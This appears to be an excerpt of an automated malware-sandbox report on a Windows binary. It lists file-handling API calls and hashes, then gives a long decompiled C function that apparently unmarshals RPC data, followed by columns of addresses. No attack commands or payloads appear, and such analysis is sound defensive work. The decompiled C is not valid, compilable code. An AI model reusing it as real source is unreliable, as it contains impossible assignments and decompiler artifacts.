                                                                                              • GetShortPathNameA.KERNEL32 ref: 004056EC
                                                                                              • wsprintfA.USER32 ref: 0040570A
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040576A
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004057C2
                                                                                              • GlobalFree.KERNEL32 ref: 004057C9
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004057D0
                                                                                                • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                                                                                • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                              • String ID: %s=%s$[Rename]$`Ae
                                                                                              • API String ID: 3772915668-343329245
                                                                                              • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                                                                              • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                                                                                              • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                                                                              • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D99A7, Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 313COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 24%
                                                                                              			E6F1D99A7() {
				void* _t219;
				void* _t221;
				void* _t222;

				L0:
				while(1) {
					L0:
					E6F1E0730( *(_t219 + 0xc), 0, ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c);
					_t222 = _t221 + 0xc;
					 *(_t219 + 0xc) =  *(_t219 + 0xc) + ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c;
					while(1) {
						L47:
						 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
						L1:
						while(( *( *(_t219 + 0x10)) & 0x000000ff) != 0x5b) {
							 *(_t219 - 0xc) =  *( *(_t219 + 0x10)) & 0x000000ff;
							 *(_t219 - 0xc) =  *(_t219 - 0xc) - 1;
							if( *(_t219 - 0xc) > 0xb8) {
								L46:
								0x6f1d0000("unhandled format %d\n",  *( *(_t219 + 0x10)) & 0x000000ff);
								_t222 = _t222 + 8;
								while(1) {
									L47:
									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
									goto L1;
								}
							}
							L3:
							_t15 =  *(_t219 - 0xc) + 0x6f1d9b24; // 0xcccccc0f
							switch( *((intOrPtr*)(( *_t15 & 0x000000ff) * 4 +  &M6F1D9AE0))) {
								case 0:
									L4:
									E6F1DAFA0( *((intOrPtr*)(_t219 + 8)),  *(_t219 + 0xc), 1);
									_push( *(_t219 + 0xc));
									_push( *( *(_t219 + 0xc)) & 0x0000ffff);
									_push("byte=%d => %p\n");
									0x6f1d0000();
									_t222 = _t222 + 0x18;
									 *(_t219 + 0xc) =  &(( *(_t219 + 0xc))[0]);
									L47:
									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
									goto L1;
								case 1:
									L5:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
									_push("short=%d => %p\n");
									0x6f1d0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 2;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 2:
									L9:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("long=%d => %p\n");
									0x6f1d0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 3:
									L12:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									asm("cvtss2sd xmm0, [eax]");
									__esp = __esp - 8;
									asm("movsd [esp], xmm0");
									_push("float=%f => %p\n");
									0x6f1d0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 4:
									L13:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__edx + 4);
									_push(__eax);
									__ecx =  *__edx;
									_push(__ecx);
									0x6f1d0000();
									__esp = __esp + 8;
									_push(__eax);
									_push("longlong=%s => %p\n");
									0x6f1d0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 5:
									L14:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__esp = __esp - 8;
									asm("movsd xmm0, [eax]");
									asm("movsd [esp], xmm0");
									_push("double=%f => %p\n");
									0x6f1d0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 6:
									L6:
									__edx = __ebp - 4;
									 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8), __ebp - 4, 2);
									__ecx =  *(__ebp - 4) & 0x0000ffff;
									__edx =  *(__ebp + 0xc);
									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("enum16=%d => %p\n");
									0x6f1d0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0xc);
									if( *( *(__ebp + 0xc)) > 0x7fff) {
										_push(0x6f5);
										__eax =  *0x6f1d0000();
									}
									L8:
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 7:
									L15:
									 *(__ebp - 0x1c) = 0;
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									_push("pointer => %p\n");
									0x6f1d0000();
									__esp = __esp + 8;
									__eax =  *(__ebp + 0x10);
									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										__edx =  *(__ebp + 0x10);
										 *(__ebp + 0x14) =  *(__ebp + 0x10);
									}
									__eax =  *(__ebp + 0x14);
									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(__ecx != 0x11) {
										 *(__ebp + 8) =  *(__ebp + 8) + 4;
										__eax = E6F1D73D0(__ecx,  *(__ebp + 8) + 4, 4);
									}
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									 *(__ebp - 0x20) =  *(__eax + 4);
									__edx =  *(__ebp + 8);
									if( *( *(__ebp + 8) + 0x34) == 0) {
										__ecx =  *(__ebp + 0x14);
										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											 *(__ebp + 8) = E6F1DAF00( *(__ebp + 8), 4);
										}
									} else {
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 0x34);
										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
										__eax =  *(__ebp + 8);
										 *( *(__ebp + 8) + 0x34) = 0;
										 *(__ebp - 0x1c) = 1;
									}
									__ecx =  *(__ebp + 0x18) & 0x000000ff;
									__edx =  *(__ebp + 0x14);
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__ebp - 0x20);
									__ecx =  *(__ebp + 8);
									__eax = E6F1DB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
									if( *(__ebp - 0x1c) == 0) {
										L29:
										__edx =  *(__ebp + 0x10);
										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
										} else {
											__ecx =  *(__ebp + 0x14);
											__ecx =  *(__ebp + 0x14) + 4;
											 *(__ebp + 0x14) = __ecx;
										}
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										while(1) {
											L47:
											 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
											goto L1;
										}
									} else {
										do {
											L24:
											__edx =  *(__ebp + 8);
											__eax =  *(__edx + 0x14);
											_push( *(__edx + 0x14));
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__ebp + 8);
											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
											_push( *(__eax + 4) -  *(__edx + 8));
											_push("buffer=%d/%d\n");
											0x6f1d0000();
											__esp = __esp + 0xc;
											__edx =  *(__ebp + 8);
											__eax =  *( *(__ebp + 8));
											__ecx =  *(__eax + 8);
											__edx =  *(__ebp + 8);
											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__eax =  *(__ebp + 8);
											if( *( *(__ebp + 8) + 4) > __ecx) {
												__ecx =  *(__ebp + 8);
												__edx =  *( *(__ebp + 8));
												__eax =  *(__edx + 8);
												__ecx =  *(__ebp + 8);
												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
												__edx =  *(__ebp + 8);
												 *(__edx + 4) =  *(__edx + 4) - __eax;
												_push( *(__edx + 4) - __eax);
												_push("buffer overflow %d bytes\n");
												0x6f1d0000();
												__esp = __esp + 8;
											}
											__edx = 0;
										} while (0 != 0);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 4);
										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp - 0x20);
										 *( *(__ebp + 8) + 4) = __ecx;
										__edx =  *(__ebp + 0x14);
										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__ecx =  *(__ebp + 8);
											__eax = E6F1DAF00( *(__ebp + 8), 4);
										}
										goto L29;
									}
								case 8:
									L33:
									__ecx =  *(__ebp - 0x10);
									__edx = __ebp + 0xc;
									__eax = E6F1D7480(__ecx, __ebp + 0xc, __ecx, 2);
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 9:
									L34:
									__eax =  *(__ebp - 0x10);
									__ecx = __ebp + 0xc;
									__eax = E6F1D7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xa:
									L35:
									__edx =  *(__ebp - 0x10);
									__ebp + 0xc = E6F1D7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xb:
									goto L0;
								case 0xc:
									L36:
									1 = 1 << 0;
									__eax =  *(__ebp + 0x10);
									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									__eax =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									__edx =  *(__ebp - 8);
									__eax =  *(__ebp + 8);
									 *(__ebp - 0x18) = E6F1DE3A0( *(__ebp + 8),  *(__ebp - 8));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp - 0x18);
									_push( *(__ebp - 0x18));
									_push("embedded complex (size=%d) => %p\n");
									0x6f1d0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0x18) & 0x000000ff;
									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
										__ecx =  *(__ebp - 0x18);
										__edx =  *(__ebp + 0xc);
										__eax = E6F1E0730( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
									}
									__eax =  *(__ebp - 8);
									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
									__ecx =  *( *(__ebp - 8)) & 0x7f;
									__edx =  *(0x6f1eb3d8 + __ecx * 4);
									 *(__ebp - 0x14) =  *(0x6f1eb3d8 + __ecx * 4);
									if( *(__ebp - 0x14) == 0) {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										_push( *( *(__ebp - 8)) & 0x000000ff);
										_push("no unmarshaller for embedded type %02x\n");
										0x6f1d0000();
										__esp = __esp + 8;
									} else {
										__eax =  *(__ebp - 8);
										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										} else {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax =  *(__ebp + 0xc);
											_push( *(__ebp + 0xc));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										}
									}
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
									 *(__ebp + 0xc) = __ecx;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									goto L1;
								case 0xd:
									L45:
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xe:
									L10:
									__edx = __ebp - 0x24;
									 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8), __ebp - 0x24, 4);
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ebp - 0x24);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *__ecx;
									_push( *__ecx);
									_push("int3264=%ld => %p\n");
									0x6f1d0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xf:
									L11:
									__ecx = __ebp - 0x28;
									__edx =  *(__ebp + 8);
									E6F1DAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
									__ecx =  *(__ebp - 0x28);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									_push(__ecx);
									_push("uint3264=%ld => %p\n");
									0x6f1d0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0x10:
									goto L46;
							}
						}
						return  *(_t219 + 0xc);
					}
				}
			}






                                                                                              0x6f1d99a7
                                                                                              0x6f1d99a7
                                                                                              0x6f1d99a7
                                                                                              0x6f1d99b7
                                                                                              0x6f1d99bc
                                                                                              0x6f1d99cc
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d956c
                                                                                              0x6f1d9581
                                                                                              0x6f1d958a
                                                                                              0x6f1d9594
                                                                                              0x6f1d9ab7
                                                                                              0x6f1d9ac3
                                                                                              0x6f1d9ac8
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x6f1d9acb
                                                                                              0x6f1d959a
                                                                                              0x6f1d959d
                                                                                              0x6f1d95a4
                                                                                              0x00000000
                                                                                              0x6f1d95ab
                                                                                              0x6f1d95b5
                                                                                              0x6f1d95c0
                                                                                              0x6f1d95c7
                                                                                              0x6f1d95c8
                                                                                              0x6f1d95cd
                                                                                              0x6f1d95d2
                                                                                              0x6f1d95db
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d95e3
                                                                                              0x6f1d95e5
                                                                                              0x6f1d95ed
                                                                                              0x6f1d95f5
                                                                                              0x6f1d95f8
                                                                                              0x6f1d95f9
                                                                                              0x6f1d95fc
                                                                                              0x6f1d95ff
                                                                                              0x6f1d9600
                                                                                              0x6f1d9605
                                                                                              0x6f1d960a
                                                                                              0x6f1d960d
                                                                                              0x6f1d9610
                                                                                              0x6f1d9613
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d9671
                                                                                              0x6f1d9673
                                                                                              0x6f1d967b
                                                                                              0x6f1d9683
                                                                                              0x6f1d9686
                                                                                              0x6f1d9687
                                                                                              0x6f1d968a
                                                                                              0x6f1d968c
                                                                                              0x6f1d968d
                                                                                              0x6f1d9692
                                                                                              0x6f1d9697
                                                                                              0x6f1d969a
                                                                                              0x6f1d969d
                                                                                              0x6f1d96a0
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d9726
                                                                                              0x6f1d9728
                                                                                              0x6f1d972c
                                                                                              0x6f1d9730
                                                                                              0x6f1d9738
                                                                                              0x6f1d973b
                                                                                              0x6f1d973c
                                                                                              0x6f1d973f
                                                                                              0x6f1d9743
                                                                                              0x6f1d9746
                                                                                              0x6f1d974b
                                                                                              0x6f1d9750
                                                                                              0x6f1d9755
                                                                                              0x6f1d9758
                                                                                              0x6f1d975b
                                                                                              0x6f1d975e
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d9766
                                                                                              0x6f1d9768
                                                                                              0x6f1d9770
                                                                                              0x6f1d9778
                                                                                              0x6f1d977b
                                                                                              0x6f1d977c
                                                                                              0x6f1d977f
                                                                                              0x6f1d9782
                                                                                              0x6f1d9783
                                                                                              0x6f1d9785
                                                                                              0x6f1d9786
                                                                                              0x6f1d978b
                                                                                              0x6f1d978e
                                                                                              0x6f1d978f
                                                                                              0x6f1d9794
                                                                                              0x6f1d9799
                                                                                              0x6f1d979f
                                                                                              0x6f1d97a2
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d97aa
                                                                                              0x6f1d97ac
                                                                                              0x6f1d97b0
                                                                                              0x6f1d97b4
                                                                                              0x6f1d97bc
                                                                                              0x6f1d97bf
                                                                                              0x6f1d97c0
                                                                                              0x6f1d97c3
                                                                                              0x6f1d97c6
                                                                                              0x6f1d97ca
                                                                                              0x6f1d97cf
                                                                                              0x6f1d97d4
                                                                                              0x6f1d97d9
                                                                                              0x6f1d97dc
                                                                                              0x6f1d97df
                                                                                              0x6f1d97e2
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d961b
                                                                                              0x6f1d961d
                                                                                              0x6f1d9625
                                                                                              0x6f1d962d
                                                                                              0x6f1d9631
                                                                                              0x6f1d9634
                                                                                              0x6f1d9636
                                                                                              0x6f1d9639
                                                                                              0x6f1d963a
                                                                                              0x6f1d963d
                                                                                              0x6f1d963f
                                                                                              0x6f1d9640
                                                                                              0x6f1d9645
                                                                                              0x6f1d964a
                                                                                              0x6f1d964d
                                                                                              0x6f1d9656
                                                                                              0x6f1d9658
                                                                                              0x6f1d965d
                                                                                              0x6f1d965d
                                                                                              0x6f1d9663
                                                                                              0x6f1d9663
                                                                                              0x6f1d9666
                                                                                              0x6f1d9669
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d97ea
                                                                                              0x6f1d97ea
                                                                                              0x6f1d97f1
                                                                                              0x6f1d97f4
                                                                                              0x6f1d97f5
                                                                                              0x6f1d97fa
                                                                                              0x6f1d97ff
                                                                                              0x6f1d9802
                                                                                              0x6f1d9805
                                                                                              0x6f1d980b
                                                                                              0x6f1d980d
                                                                                              0x6f1d9810
                                                                                              0x6f1d9810
                                                                                              0x6f1d9813
                                                                                              0x6f1d9816
                                                                                              0x6f1d981c
                                                                                              0x6f1d9823
                                                                                              0x6f1d9827
                                                                                              0x6f1d982c
                                                                                              0x6f1d982f
                                                                                              0x6f1d9832
                                                                                              0x6f1d9835
                                                                                              0x6f1d9838
                                                                                              0x6f1d983f
                                                                                              0x6f1d9860
                                                                                              0x6f1d9863
                                                                                              0x6f1d9869
                                                                                              0x6f1d9871
                                                                                              0x6f1d9876
                                                                                              0x6f1d9841
                                                                                              0x6f1d9841
                                                                                              0x6f1d9844
                                                                                              0x6f1d9847
                                                                                              0x6f1d984a
                                                                                              0x6f1d984d
                                                                                              0x6f1d9850
                                                                                              0x6f1d9857
                                                                                              0x6f1d9857
                                                                                              0x6f1d9879
                                                                                              0x6f1d987e
                                                                                              0x6f1d9882
                                                                                              0x6f1d9885
                                                                                              0x6f1d9888
                                                                                              0x6f1d988c
                                                                                              0x6f1d9890
                                                                                              0x6f1d9894
                                                                                              0x6f1d98a0
                                                                                              0x6f1d9935
                                                                                              0x6f1d9935
                                                                                              0x6f1d9938
                                                                                              0x6f1d993e
                                                                                              0x6f1d994e
                                                                                              0x6f1d9951
                                                                                              0x6f1d9940
                                                                                              0x6f1d9940
                                                                                              0x6f1d9943
                                                                                              0x6f1d9946
                                                                                              0x6f1d9946
                                                                                              0x6f1d9957
                                                                                              0x6f1d995a
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a6
                                                                                              0x6f1d98a9
                                                                                              0x6f1d98ac
                                                                                              0x6f1d98ad
                                                                                              0x6f1d98b0
                                                                                              0x6f1d98b2
                                                                                              0x6f1d98b8
                                                                                              0x6f1d98bb
                                                                                              0x6f1d98bc
                                                                                              0x6f1d98c1
                                                                                              0x6f1d98c6
                                                                                              0x6f1d98c9
                                                                                              0x6f1d98cc
                                                                                              0x6f1d98ce
                                                                                              0x6f1d98d1
                                                                                              0x6f1d98d4
                                                                                              0x6f1d98d7
                                                                                              0x6f1d98dd
                                                                                              0x6f1d98df
                                                                                              0x6f1d98e2
                                                                                              0x6f1d98e4
                                                                                              0x6f1d98e7
                                                                                              0x6f1d98ea
                                                                                              0x6f1d98ed
                                                                                              0x6f1d98f3
                                                                                              0x6f1d98f5
                                                                                              0x6f1d98f6
                                                                                              0x6f1d98fb
                                                                                              0x6f1d9900
                                                                                              0x6f1d9900
                                                                                              0x6f1d9903
                                                                                              0x6f1d9903
                                                                                              0x6f1d9907
                                                                                              0x6f1d990a
                                                                                              0x6f1d990d
                                                                                              0x6f1d9910
                                                                                              0x6f1d9913
                                                                                              0x6f1d9916
                                                                                              0x6f1d9919
                                                                                              0x6f1d991c
                                                                                              0x6f1d991f
                                                                                              0x6f1d9925
                                                                                              0x6f1d9929
                                                                                              0x6f1d992d
                                                                                              0x6f1d9932
                                                                                              0x00000000
                                                                                              0x6f1d9925
                                                                                              0x00000000
                                                                                              0x6f1d9962
                                                                                              0x6f1d9964
                                                                                              0x6f1d9968
                                                                                              0x6f1d996c
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d9979
                                                                                              0x6f1d997b
                                                                                              0x6f1d997f
                                                                                              0x6f1d9983
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x6f1d9990
                                                                                              0x6f1d9992
                                                                                              0x6f1d999a
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9acb
                                                                                              0x6f1d9ad1
                                                                                              0x00000000
                                                                                              0x6f1d9ad4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1d99d4
                                                                                              0x6f1d99d9
                                                                                              0x6f1d99dc
                                                                                              0x6f1d99e3
                                                                                              0x6f1d99e6
                                                                                              0x6f1d99ec
                                                                                              0x6f1d99ef
                                                                                              0x6f1d99f2
                                                                                              0x6f1d99f8
                                                                                              0x6f1d99fb
                                                                                              0x6f1d99fe
                                                                                              0x6f1d9a02
                                                                                              0x6f1d9a0e
                                                                                              0x6f1d9a11
                                                                                              0x6f1d9a14
                                                                                              0x6f1d9a15
